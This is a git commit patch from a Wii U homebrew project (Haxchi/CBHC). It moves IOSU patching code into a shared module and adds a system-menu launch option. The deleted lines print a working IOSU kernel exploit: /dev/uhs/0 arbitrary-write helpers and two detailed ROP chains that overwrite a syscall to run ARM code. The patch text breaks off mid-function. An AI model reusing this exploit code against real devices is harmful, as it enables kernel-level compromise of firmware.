From 0ad99123db6ffd119f38badaab3ab97ea3c40999 Mon Sep 17 00:00:00 2001 From: FIX94 Date: Mon, 19 Dec 2016 04:14:47 +0100 Subject: [PATCH] -use same iosu patcher for both haxchi and cbhc to allow haxchi to benefit from it -added new config option to haxchi, "sysmenu" which will relaunch you into the system menu with signature, region patches and everything else that cbhc patches -small logic correction in the iosu patcher --- dsrom/CBHC/README | 2 - dsrom/Makefile | 12 +- dsrom/cbhc_menu/Makefile | 32 ++ dsrom/{CBHC => cbhc_menu}/coreinit.h | 0 dsrom/{CBHC => cbhc_menu}/crt0.S | 0 dsrom/{CBHC => cbhc_menu}/main.c | 378 +---------------- dsrom/{CBHC => cbhc_menu}/pad.h | 0 dsrom/{CBHC => cbhc_menu}/types.h | 0 dsrom/cfw_booter/Makefile | 44 -- dsrom/cfw_booter/README | 2 - dsrom/cfw_booter/arm_kernel/Makefile | 71 ---- dsrom/cfw_booter/arm_kernel/link.ld | 18 - dsrom/cfw_booter/arm_kernel/source/crt0.s | 12 - dsrom/cfw_booter/arm_kernel/source/main.c | 122 ------ dsrom/cfw_booter/arm_kernel/source/types.h | 16 - dsrom/cfw_booter/arm_kernel/source/utils.c | 25 -- dsrom/cfw_booter/arm_kernel/source/utils.h | 7 - dsrom/cfw_booter/arm_user/Makefile | 71 ---- dsrom/cfw_booter/arm_user/link.ld | 18 - dsrom/cfw_booter/arm_user/source/crt0.s | 20 - dsrom/cfw_booter/arm_user/source/main.c | 30 -- dsrom/cfw_booter/arm_user/source/types.h | 16 - dsrom/cfw_booter/arm_user/source/utils.c | 25 -- dsrom/cfw_booter/arm_user/source/utils.h | 7 - dsrom/cfw_booter/crt0.S | 7 - dsrom/cfw_booter/main.c | 387 ----------------- dsrom/global.h | 10 + dsrom/haxchi_rop.s | 24 +- dsrom/haxchi_rop_cb.s | 22 +- dsrom/{CBHC => iosu_patcher}/Makefile | 8 +- .../arm_kernel/Makefile | 0 .../{CBHC => iosu_patcher}/arm_kernel/link.ld | 0 .../arm_kernel/source/crt0.s | 0 .../arm_kernel/source/elf_abi.h | 0 .../arm_kernel/source/elf_patcher.c | 0 .../arm_kernel/source/elf_patcher.h | 0 .../arm_kernel/source/getbins.c | 3 + .../arm_kernel/source/getbins.h | 0 .../arm_kernel/source/main.c | 43 +- .../arm_kernel/source/mmu.s | 0 .../arm_kernel/source/reload.c | 14 +- .../arm_kernel/source/reload.h | 0 .../arm_kernel/source/types.h | 0 .../arm_kernel/source/utils.c | 0 .../arm_kernel/source/utils.h | 0 .../{CBHC => iosu_patcher}/arm_user/Makefile | 0 dsrom/{CBHC => iosu_patcher}/arm_user/link.ld | 0 .../arm_user/source/crt0.s | 0 .../arm_user/source/main.c | 0 .../arm_user/source/types.h | 0 .../arm_user/source/utils.c | 0 .../arm_user/source/utils.h | 0 dsrom/{cfw_booter => iosu_patcher}/coreinit.h | 0 dsrom/iosu_patcher/crt0.S | 6 + dsrom/iosu_patcher/main.c | 388 ++++++++++++++++++ .../{CBHC => iosu_patcher}/titleprot/Makefile | 0 .../{CBHC => iosu_patcher}/titleprot/ccd00.ld | 0 .../titleprot/ccd00.specs | 0 .../titleprot/source/crt0.s | 0 dsrom/{cfw_booter => iosu_patcher}/types.h | 2 - dsrom/option_select/Makefile | 8 +- dsrom/option_select/main.c | 42 +- installer/src/main.c | 4 +- release/haxchi/config.txt | 1 + release/wiiu/apps/cbhc/meta.xml | 4 +- release/wiiu/apps/haxchi/meta.xml | 4 +- 66 files changed, 571 insertions(+), 1334 deletions(-) delete mode 100644 dsrom/CBHC/README create mode 100644 dsrom/cbhc_menu/Makefile rename dsrom/{CBHC => cbhc_menu}/coreinit.h (100%) rename dsrom/{CBHC => cbhc_menu}/crt0.S (100%) rename dsrom/{CBHC => cbhc_menu}/main.c (51%) rename dsrom/{CBHC => cbhc_menu}/pad.h (100%) rename dsrom/{CBHC => cbhc_menu}/types.h (100%) delete mode 100644 dsrom/cfw_booter/Makefile delete mode 100644 dsrom/cfw_booter/README delete mode 100644 dsrom/cfw_booter/arm_kernel/Makefile delete mode 100644 dsrom/cfw_booter/arm_kernel/link.ld delete mode 100644 dsrom/cfw_booter/arm_kernel/source/crt0.s delete mode 100644 dsrom/cfw_booter/arm_kernel/source/main.c delete mode 100644 dsrom/cfw_booter/arm_kernel/source/types.h delete mode 100644 dsrom/cfw_booter/arm_kernel/source/utils.c delete mode 100644 dsrom/cfw_booter/arm_kernel/source/utils.h delete mode 100644 dsrom/cfw_booter/arm_user/Makefile delete mode 100644 dsrom/cfw_booter/arm_user/link.ld delete mode 100644 dsrom/cfw_booter/arm_user/source/crt0.s delete mode 100644 dsrom/cfw_booter/arm_user/source/main.c delete mode 100644 dsrom/cfw_booter/arm_user/source/types.h delete mode 100644 dsrom/cfw_booter/arm_user/source/utils.c delete mode 100644 dsrom/cfw_booter/arm_user/source/utils.h delete mode 100644 dsrom/cfw_booter/crt0.S delete mode 100644 dsrom/cfw_booter/main.c create mode 100644 dsrom/global.h rename dsrom/{CBHC => iosu_patcher}/Makefile (87%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/Makefile (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/link.ld (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/crt0.s (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/elf_abi.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/elf_patcher.c (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/elf_patcher.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/getbins.c (84%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/getbins.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/main.c (86%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/mmu.s (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/reload.c (90%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/reload.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/types.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/utils.c (100%) rename dsrom/{CBHC => iosu_patcher}/arm_kernel/source/utils.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/Makefile (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/link.ld (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/source/crt0.s (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/source/main.c (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/source/types.h (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/source/utils.c (100%) rename dsrom/{CBHC => iosu_patcher}/arm_user/source/utils.h (100%) rename dsrom/{cfw_booter => iosu_patcher}/coreinit.h (100%) create mode 100644 dsrom/iosu_patcher/crt0.S create mode 100644 dsrom/iosu_patcher/main.c rename dsrom/{CBHC => iosu_patcher}/titleprot/Makefile (100%) rename dsrom/{CBHC => iosu_patcher}/titleprot/ccd00.ld (100%) rename dsrom/{CBHC => iosu_patcher}/titleprot/ccd00.specs (100%) rename dsrom/{CBHC => iosu_patcher}/titleprot/source/crt0.s (100%) rename dsrom/{cfw_booter => iosu_patcher}/types.h (94%) diff --git a/dsrom/CBHC/README b/dsrom/CBHC/README deleted file mode 100644 index 2dbcc78..0000000 --- a/dsrom/CBHC/README +++ /dev/null @@ -1,2 +0,0 @@ -This is a modified version of cfw booter which can be found here: -https://github.com/dimok789/cfw_booter \ No newline at end of file diff --git a/dsrom/Makefile b/dsrom/Makefile index f02f69c..8001715 100644 --- a/dsrom/Makefile +++ b/dsrom/Makefile @@ -54,10 +54,10 @@ zeldaph: setup_zeldaph zeldaph.nds zeldast: setup_zeldast zeldast.nds setup: - @cd option_select && make && cd .. + @cd cbhc_menu && make && cd .. @cd hbl_loader && make && cd .. - @cd cfw_booter && make && cd .. - @cd CBHC && make && cd .. + @cd iosu_patcher && make && cd .. + @cd option_select && make && cd .. setup_animalcrossing: @rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin @@ -267,8 +267,8 @@ zeldast.zip: clean: @rm -f *.bin *.nds ../installer/data/*.zip defines.s - @cd option_select && make clean && cd .. + @cd cbhc_menu && make clean && cd .. @cd hbl_loader && make clean && cd .. - @cd cfw_booter && make clean && cd .. - @cd CBHC && make clean && cd .. + @cd iosu_patcher && make clean && cd .. + @cd option_select && make clean && cd .. @echo "all cleaned up !" diff --git a/dsrom/cbhc_menu/Makefile b/dsrom/cbhc_menu/Makefile new file mode 100644 index 0000000..16e4976 --- /dev/null +++ b/dsrom/cbhc_menu/Makefile @@ -0,0 +1,32 @@ +PATH := $(DEVKITPPC)/bin:$(PATH) +PREFIX ?= powerpc-eabi- +CC = $(PREFIX)gcc +AS = $(PREFIX)gcc +CFLAGS = -std=gnu89 -O3 -Wall -nostdinc -fno-builtin -I$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0/include -I$(DEVKITPPC)/powerpc-eabi/include +ASFLAGS = -mregnames -x assembler-with-cpp +LD = $(PREFIX)ld +OBJCOPY = $(PREFIX)objcopy +LDFLAGS=-Ttext 1808000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0 -L$(DEVKITPPC)/powerpc-eabi/lib -lgcc -lc +OBJDUMP ?= $(PREFIX)objdump +project := . +root := $(CURDIR) +build := $(root)/bin + +FIRMWARE = 550 + +all: clean setup main + +setup: + mkdir -p $(root)/bin/ + +main: + $(CC) $(CFLAGS) -DVER=$(FIRMWARE) -c $(project)/main.c + $(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S + cp -r $(root)/*.o $(build) + rm $(root)/*.o + $(LD) -o cbhc_menu.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map cbhc_menu.map + $(OBJCOPY) cbhc_menu.elf -S -O binary ../cbhc_menu.bin + +clean: + rm -rf $(build) payload + rm -rf cbhc_menu.elf cbhc_menu.map diff --git a/dsrom/CBHC/coreinit.h b/dsrom/cbhc_menu/coreinit.h similarity index 100% rename from dsrom/CBHC/coreinit.h rename to dsrom/cbhc_menu/coreinit.h diff --git a/dsrom/CBHC/crt0.S b/dsrom/cbhc_menu/crt0.S similarity index 100% rename from dsrom/CBHC/crt0.S rename to dsrom/cbhc_menu/crt0.S diff --git a/dsrom/CBHC/main.c b/dsrom/cbhc_menu/main.c similarity index 51% rename from dsrom/CBHC/main.c rename to dsrom/cbhc_menu/main.c index 43d97ae..aa176ef 100644 --- a/dsrom/CBHC/main.c +++ b/dsrom/cbhc_menu/main.c @@ -8,21 +8,8 @@ #include "types.h" #include "coreinit.h" #include "pad.h" +#include "../global.h" -#define CHAIN_START 0x1016AD40 -#define SHUTDOWN 0x1012EE4C -#define SIMPLE_RETURN 0x101014E4 -#define SOURCE 0x01E20000 -#define IOS_CREATETHREAD 0x1012EABC -#define ARM_CODE_BASE 0x08135000 -#define REPLACE_SYSCALL 0x081298BC - -/* YOUR ARM CODE HERE (starts at ARM_CODE_BASE) */ -#include "payload/arm_kernel_bin.h" -#include "payload/arm_user_bin.h" - -static void uhs_exploit_init(unsigned int coreinit_handle); -static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val); static unsigned int getButtonsDown(unsigned int padscore_handle, unsigned int vpad_handle); #define BUS_SPEED 248625000 @@ -38,7 +25,7 @@ static unsigned int getButtonsDown(unsigned int padscore_handle, unsigned int vp #define SD_HBL_PATH "/vol/external01/wiiu/apps/homebrew_launcher/homebrew_launcher.elf" #define SD_MOCHA_PATH "/vol/external01/wiiu/apps/mocha/mocha.elf" -static const char *verChar = "CBHC v1.4 by FIX94"; +static const char *verChar = "CBHC v1.4u1 by FIX94"; #define DEFAULT_DISABLED 0 #define DEFAULT_SYSMENU 1 @@ -63,11 +50,6 @@ static const char *bootOpts[DEFAULT_MAX] = { "fw.img on SD Card", }; -#define LAUNCH_SYSMENU 0 -#define LAUNCH_HBL 1 -#define LAUNCH_MOCHA 2 -#define LAUNCH_CFW_IMG 3 - #define OSScreenEnable(enable) OSScreenEnableEx(0, enable); OSScreenEnableEx(1, enable); #define OSScreenClearBuffer(tmp) OSScreenClearBufferEx(0, tmp); OSScreenClearBufferEx(1, tmp); #define OSScreenPutFont(x, y, buf) OSScreenPutFontEx(0, x, y, buf); OSScreenPutFontEx(1, x, y, buf); @@ -413,11 +395,6 @@ doIOSUexploit: OSScreenClearBuffer(0); OSScreenFlipBuffers(); - memcpy((void*)0xF5E70100, &sysmenu, 8); - *(volatile unsigned int*)0xF5E70108 = dsvcid; - *(volatile unsigned int*)0xF5E7010C = launchmode; - DCStoreRange((void*)0xF5E70100, 0x20); - int (*OSForceFullRelaunch)(void); OSDynLoad_FindExport(coreinit_handle, 0, "OSForceFullRelaunch", &OSForceFullRelaunch); @@ -427,22 +404,16 @@ doIOSUexploit: void(*_SYSLaunchMenuWithCheckingAccount)(unsigned char slot); OSDynLoad_FindExport(sysapp_handle,0,"_SYSLaunchMenuWithCheckingAccount",&_SYSLaunchMenuWithCheckingAccount); - int (*IOS_Open)(char *path, unsigned int mode); - int (*IOS_Close)(int fd); - OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open); - OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close); + //store path to sd fw.img for arm_kernel + if(launchmode == LAUNCH_CFW_IMG) + { + strcpy((void*)0xF5E70000,"/vol/sdcard"); + DCStoreRange((void*)0xF5E70000,0x100); + } - int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0); //! Open /dev/uhs/0 IOS node - uhs_exploit_init(coreinit_handle); //! Init variables for the exploit - - //!------ROP CHAIN------- - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20); - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x10, 0x1011814C); - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0xC, SOURCE); - - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START, 0x1012392b); // pop {R4-R6,PC} - - IOS_Close(dev_uhs_0_handle); + //do iosu patches + void (*patch_iosu)(unsigned int coreinit_handle, unsigned int sysapp_handle, int launchmode, int from_cbhc) = (void*)0x01804000; + patch_iosu(coreinit_handle, sysapp_handle, launchmode, 1); if(launchmode == LAUNCH_HBL) { @@ -454,6 +425,7 @@ doIOSUexploit: strcpy((void*)0xF5E70000,SD_MOCHA_PATH); return 0x01800000; } + //sysmenu or cfw if(launchmode == LAUNCH_CFW_IMG) { @@ -599,329 +571,3 @@ static unsigned int getButtonsDown(unsigned int padscore_handle, unsigned int vp return btnDown; } - -/* ROP CHAIN STARTS HERE (0x1015BD78) */ -static const int final_chain[] = { - 0x101236f3, // 0x00 POP {R1-R7,PC} - 0x0, // 0x04 arg - 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR - 0x68, // 0x0C stacksize - 0x10101638, // 0x10 - 0x0, // 0x14 - 0x0, // 0x18 - 0x0, // 0x1C - 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x30 - 0x0, // 0x34 - IOS_CREATETHREAD, // 0x38 - 0x1, // 0x3C - 0x2, // 0x40 - 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE92D4010, // 0x4C value: PUSH {R4,LR} - 0x0, // 0x50 - 0x10123a8b, // 0x54 POP {R3,R4,PC} - 0x1, // 0x58 R3 must be 1 for the arbitrary write - 0x0, // 0x5C - 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x64 - 0x0, // 0x68 - 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) - 0x0, // 0x70 - 0x0, // 0x74 - 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A04000, // 0x80 value: MOV R4, R0 - 0x0, // 0x84 - 0x10123a8b, // 0x88 POP {R3,R4,PC} - 0x1, // 0x8C R3 must be 1 for the arbitrary write - 0x0, // 0x90 - 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x98 - 0x0, // 0x9C - 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) - 0x0, // 0xA4 - 0x0, // 0xA8 - 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF - 0x0, // 0xB8 - 0x10123a8b, // 0xBC POP {R3,R4,PC} - 0x1, // 0xC0 R3 must be 1 for the arbitrary write - 0x0, // 0xC4 - 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0xCC - 0x0, // 0xD0 - 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) - 0x0, // 0xD8 - 0x0, // 0xDC - 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) - 0x0, // 0xEC - 0x10123a8b, // 0xF0 POP {R3,R4,PC} - 0x1, // 0xF4 R3 must be 1 for the arbitrary write - 0x0, // 0xF8 - 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x100 - 0x0, // 0x104 - 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) - 0x0, // 0x10C - 0x0, // 0x110 - 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A00004, // 0x11C value: MOV R0, R4 - 0x0, // 0x120 - 0x10123a8b, // 0x124 POP {R3,R4,PC} - 0x1, // 0x128 R3 must be 1 for the arbitrary write - 0x0, // 0x12C - 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x134 - 0x0, // 0x138 - 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) - 0x0, // 0x140 - 0x0, // 0x144 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x00000000, // 0x150 value: NOP - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x1AFFFFFD, // 0x150 value: BNE clean_loop - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A03004, // 0x184 value: MOV R3, R4 - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE8BD4010, // 0x184 value: POP {R4,LR} - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) - 0x0, // 0x1BC - 0x10123a8b, // 0x1C0 POP {R3,R4,PC} - 0x1, // 0x1C4 R3 must be 1 for the arbitrary write - 0x0, // 0x1C8 - 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x1D0 - 0x0, // 0x1D4 - 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64 - 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches - 0x0, // 0x1E0 - 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - ARM_CODE_BASE, // 0x1E8 our code destination address - 0x0, // 0x1EC - 0x0, // 0x1F0 - 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} - 0x0, // 0x1F8 - sizeof(arm_kernel_bin), // 0x1FC our code size - 0x0, // 0x200 - 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} - 0x01E40000, // 0x208 our code source location - 0x08131D04, // 0x20C KERNEL_MEMCPY address - 0x0, // 0x210 - 0x0, // 0x214 - 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) - 0x0, - 0x0, - 0x101312D0, -}; - -static const int second_chain[] = { - 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} - CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination - 0x0, // 0x08 - 0x0, // 0x0C - 0x101063db, // 0x10 POP {R1,R2,R5,PC} - 0x01E30000, // 0x14 source - sizeof(final_chain), // 0x18 length - 0x0, // 0x1C - 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x101236f3, // 0x2C POP {R1-R7,PC} - 0x0, // 0x30 arg - 0x101001DC, // 0x34 stackptr - 0x68, // 0x38 stacksize - 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x40 - 0x0, // 0x44 - 0x0, // 0x48 - 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x50 - 0x0, // 0x54 - 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x5C - 0x0, // 0x60 - IOS_CREATETHREAD, // 0x64 - 0x1, // 0x68 priority - 0x2, // 0x6C flags - 0x0, // 0x70 - 0x0, // 0x74 - 0x101063db, // 0x78 POP {R1,R2,R5,PC} - 0x0, // 0x7C - -(0x240 + 0x18 + 0xF000), // 0x80 stack offset - 0x0, // 0x84 - 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} - 0x0, - 0x0, - 0x0, - 0x00110000 - 0x44, // 0x8C - 0x00110010, // 0x90 - 0x0, // 0x94 - 0x0, // 0x98 - 0x0, // 0x9C - 0x0, // 0xA0 - 0x0, // 0xA4 - 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack - 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} - 0x0, - 0x0, - 0x1012EA68, // 0xAC stack pivot -}; - -static void uhs_exploit_init(unsigned int coreinit_handle) -{ - void (*DCStoreRange)(const void *addr, uint32_t length); - OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); - - //! Clear out our used MEM1 area - memset((void*)0xF5E00000, 0, 0x00070000); - DCStoreRange((void*)0xF5E00000, 0x00070000); - - //!------Variables used in exploit------ - int *pretend_root_hub = (int*)0xF5E60640; - int *ayylmao = (int*)0xF5E00000; - //!------------------------------------- - - ayylmao[5] = 1; - ayylmao[8] = 0x1E00000; - - memcpy((char*)(0xF5E20000), second_chain, sizeof(second_chain)); - memcpy((char*)(0xF5E30000), final_chain, sizeof(final_chain)); - memcpy((char*)(0xF5E40000), arm_kernel_bin, sizeof(arm_kernel_bin)); - memcpy((char*)(0xF5E50000), arm_user_bin, sizeof(arm_user_bin)); - - pretend_root_hub[33] = 0x1E00000; - pretend_root_hub[78] = 0; - - //! Store current CPU cache into main memory for IOSU to read - DCStoreRange(ayylmao, 0x840); - - DCStoreRange((void*)0xF5E20000, sizeof(second_chain)); - DCStoreRange((void*)0xF5E30000, sizeof(final_chain)); - DCStoreRange((void*)0xF5E40000, sizeof(arm_kernel_bin)); - DCStoreRange((void*)0xF5E50000, sizeof(arm_user_bin)); - - DCStoreRange(pretend_root_hub, 0x160); -} - -static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val) -{ - void (*DCStoreRange)(const void *addr, uint32_t length); - void (*OSSleepTicks)(uint64_t ticks); - int (*IOS_Ioctl)(int fd, uint32_t request, void *input_buffer,uint32_t input_buffer_len, void *output_buffer, uint32_t output_buffer_len); - OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); - OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks); - OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl); - - //!------Variables used in exploit------ - int *ayylmao = (int*)0xF5E00000; - //!------------------------------------- - - ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes - DCStoreRange(ayylmao, 0x840); //! Store current CPU cache into main memory for IOSU to read - OSSleepTicks(0x200000); //! Wait for caches to refresh over in IOSU - //! index 0 is at 0x10149A6C, each index is 